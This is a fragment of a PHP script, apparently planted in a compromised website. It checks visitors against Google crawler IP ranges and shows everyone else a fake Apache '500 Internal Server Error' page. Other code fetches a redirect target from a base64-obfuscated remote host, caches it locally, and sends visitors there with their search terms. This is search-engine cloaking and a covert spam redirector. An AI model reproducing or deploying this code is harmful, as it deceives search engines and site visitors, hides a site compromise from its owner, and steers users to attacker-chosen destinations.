=3639549952)&&($ip<=3639558143)) { return false; } //GOOGLE (216.239.32.0-216.239.63.255) if (($ip>=1123631104)&&($ip<=1123639295)) { return false; } //GOOGLE (66.249.64.0-66.249.95.255) if (($ip>=1089052672)&&($ip<=1089060863)) { return false; } //GOOGLE (64.233.160.0-64.233.191.255) if (($ip>=1078218752)&&($ip<=1078220799)) { return false; } //GOOGLE (64.68.80.0-64.68.87.255) if (($ip>=1078220802)&&($ip<=1078222031)) { return false; } //GOOGLE (64.68.88.2-64.68.92.207) if (($ip>=1087381508)&&($ip<=1087382952)) { return false; } //GOOGLE (64.208.32.4-64.208.37.168) if (($ip>=3512041472)&&($ip<=3512045567)) { return false; } //GOOGLE (209.85.128.0-209.85.143.255) if (($ip>=1113980928)&&($ip<=1113985023)) { return false; } //GOOGLE (66.102.0.0-66.102.15.255) if (($ip>=1208926208)&&($ip<=1208942591)) { return false; } //GOOGLE (72.14.192.0-72.14.255.255) if (($ip>=1249705984)&&($ip<=1249771519)) { return false; } //GOOGLE (74.125.0.0-74.125.255.255) return true; } if (!thisisgooglebot($_SERVER['REMOTE_ADDR'])) { header('HTTP/1.1 500 Internal Server Error'); ?> 500 Internal Server Error

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


Apache PHP/5.3.2 Server at localhost Port 80
$query_arrvalue) { if (is_null($query_arrvalue) || $query_arrvalue=="") { unset($query_arr[$query_arrkey]); } } $subd=""; for ($i=0; $i<3; $i++) { $d=rand(1,30)%2; $subd .= $d ? chr(rand(65,90)) : chr(rand(48,57)); } $e1="bXlkcmVhbXMtaW5mby5jb20="; $e2="aHR0cDovL2Ruc3dhZmZlLmNvbS9nZXRfZG9tYWluLw=="; $redir_url="http://".strtolower($subd).".".base64_decode($e1)."/?q="; //$cache_tuxlost=86400; $cache_tuxlost=21600; $cache_file="actual.txt"; $filemtime = @filemtime($cache_file); // returns FALSE if file does not exist if (!$filemtime or (time() - $filemtime >= $cache_tuxlost)){ $actual_redir_url=trim(@file_get_contents(base64_decode($e2))); if(isUrl($actual_redir_url)) { @file_put_contents($cache_file,$actual_redir_url); } } $actual_redir_url=trim(@file_get_contents($cache_file)); if (!isUrl($actual_redir_url))$actual_redir_url=$redir_url; //echo $actual_redir_url.@implode("+",$query_arr); Header ('Location: '.$actual_redir_url.urlencode(@implode(" ",$query_arr))); exit; ?>